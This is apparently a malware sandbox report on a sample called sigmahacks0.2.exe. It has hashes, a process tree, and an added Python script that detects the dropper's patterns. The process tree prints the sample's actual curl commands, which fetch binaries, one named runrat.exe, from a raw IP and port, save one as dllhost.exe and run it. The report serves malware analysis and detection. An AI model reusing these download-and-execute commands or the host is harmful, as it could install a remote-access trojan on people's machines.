Analysis

  • max time kernel
    63s
  • max time network
    50s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    12-06-2024 16:35

General

  • Target

    sigmahacks0.2.exe

  • Size

    89KB

  • MD5

    74a12486910c20f150195ef0584d827b

  • SHA1

    e12a068b244c9646fa0ec2f989bcc08c285d1780

  • SHA256

    3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3

  • SHA512

    c515b3fc165e6453dda59ab619f8fdae28fbf85d0631f5132f8a8e682a691f64bd1ce721512385d9a416b88577346fdc7edda24eeb846d7791430619b5e4b696

  • SSDEEP

    1536:T7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfrw5COh:P7DhdC6kzWypvaQ0FxyNTBfrw

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe
    "C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3664
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:216
      • C:\Windows\system32\curl.exe
        curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"
        3⤵
          PID:4508
        • C:\Windows\system32\dllhost.exe
          dllhost.exe
          3⤵
            PID:876
          • C:\Windows\system32\curl.exe
            curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"
            3⤵
              PID:3536
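The process tree above is the whole story of this sample at the 1/10 score: a batch file staged under nested `.tmp` directories, run through the `Sysnative` redirector (the 32-bit dropper reaching the 64-bit `cmd.exe`), which uses the built-in `curl.exe` to fetch second-stage binaries from a raw IP on a non-standard port, saves one of them under the name of a Windows system binary (`dllhost.exe`) and runs it. The script below is an added example, not part of the Triage report, that encodes those observations as hunting logic and runs it over the five process records transcribed from the tree (parent PIDs are taken from the nesting; the list of commonly imitated system binary names is constructed for the example). It matches on the command-line patterns rather than on hashes, so the same checks apply to any process log that carries pid, ppid, image path and command line.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlparse

# Constructed list of Windows binaries whose names droppers commonly reuse.
SYSTEM_BINARY_NAMES = {"dllhost.exe", "svchost.exe", "csrss.exe", "lsass.exe",
                       "explorer.exe", "conhost.exe", "rundll32.exe"}

# Process records transcribed from the report's process tree:
# (pid, ppid, image path, command line). ppid follows the tree nesting.
PROCESSES = [
    (3664, None, r"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"'),
    (216, 3664, r"C:\Windows\system32\cmd.exe",
     r'"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"'),
    (4508, 216, r"C:\Windows\system32\curl.exe",
     'curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"'),
    (876, 216, r"C:\Windows\system32\dllhost.exe", "dllhost.exe"),
    (3536, 216, r"C:\Windows\system32\curl.exe",
     'curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"'),
]

CURL_CMD_RE = re.compile(r'^\s*"?(?:[^"\s]*\\)?curl(?:\.exe)?"?(?:\s|$)', re.I)
CURL_OUT_RE = re.compile(r'(?:^|\s)(?:-o|--output)\s+"?([^"\s]+)"?')
URL_RE = re.compile(r'https?://[^\s"]+')


def parse_curl_download(cmdline):
    """Return (saved_filename, url) for a curl download command line, else None."""
    if not CURL_CMD_RE.match(cmdline):
        return None
    out, url = CURL_OUT_RE.search(cmdline), URL_RE.search(cmdline)
    if not (out and url):
        return None
    return out.group(1), url.group(0)


def url_host_is_raw_ip(url):
    """True when the URL host is an IP literal rather than a DNS name."""
    try:
        ip_address(urlparse(url).hostname or "")
        return True
    except ValueError:
        return False


def url_port(url):
    """Effective TCP port of the URL, defaulting by scheme."""
    parts = urlparse(url)
    return parts.port or (443 if parts.scheme == "https" else 80)


def analyze(processes):
    """Run the checks over (pid, ppid, image, cmdline) records.

    Returns a list of (pid, finding) tuples. Records are expected in tree
    order, so a download is seen before the process that executes it.
    """
    by_pid = {rec[0]: rec for rec in processes}
    findings = []
    downloaded = {}  # lowercased saved file name -> pid of the curl that fetched it
    for pid, ppid, image, cmdline in processes:
        # The Sysnative alias only exists for 32-bit processes on 64-bit Windows;
        # a launcher using it to reach cmd.exe is worth a look on its own.
        if "sysnative" in cmdline.lower():
            findings.append((pid, "sysnative_redirector_used"))
        parsed = parse_curl_download(cmdline)
        if parsed:
            name, url = parsed
            downloaded[name.lower()] = pid
            if url_host_is_raw_ip(url):
                findings.append((pid, "curl_download_from_raw_ip"))
            if url_port(url) not in (80, 443):
                findings.append((pid, "curl_download_nonstandard_port"))
            if name.lower() in SYSTEM_BINARY_NAMES:
                findings.append((pid, "download_saved_as_system_binary_name"))
            parent = by_pid.get(ppid)
            if parent and parent[2].lower().endswith("\\cmd.exe"):
                findings.append((pid, "curl_spawned_by_cmd"))
        else:
            # Match on the image name: the sandbox resolves the path of the
            # freshly downloaded dllhost.exe to system32, so the name is the link.
            basename = image.rsplit("\\", 1)[-1].lower()
            if basename in downloaded:
                findings.append((pid, "executed_downloaded_payload"))
    return findings


if __name__ == "__main__":
    for pid, finding in analyze(PROCESSES):
        print(f"PID {pid}: {finding}")
```

Run stand-alone it lists every hit; the interesting correlation is PID 876 being flagged as `executed_downloaded_payload` because its image name equals the `-o` target of PID 4508, while the second download (`Incognito.exe`, PID 3536) is fetched but never appears as a process in the tree.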

Network

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat

    Filesize

    306B

    MD5

    aa6cd2e5eea38082199a03f164836f90

    SHA1

    93f21ab96c7f4b66e3d6d221414bbd7f82b3a293

    SHA256

    035ddce5103edf606392d566ab937bd060c1e6510eb5ffd7ffa1fc8c71f5853a

    SHA512

    dde5c9196df1246b5bbd69a7926fe8aa514c82daa01ead3eca1e5b1fdeb2c86678881cfabf8bf78a501be366a272c6aac92849a77d58e5db2bd6cda511a6cc06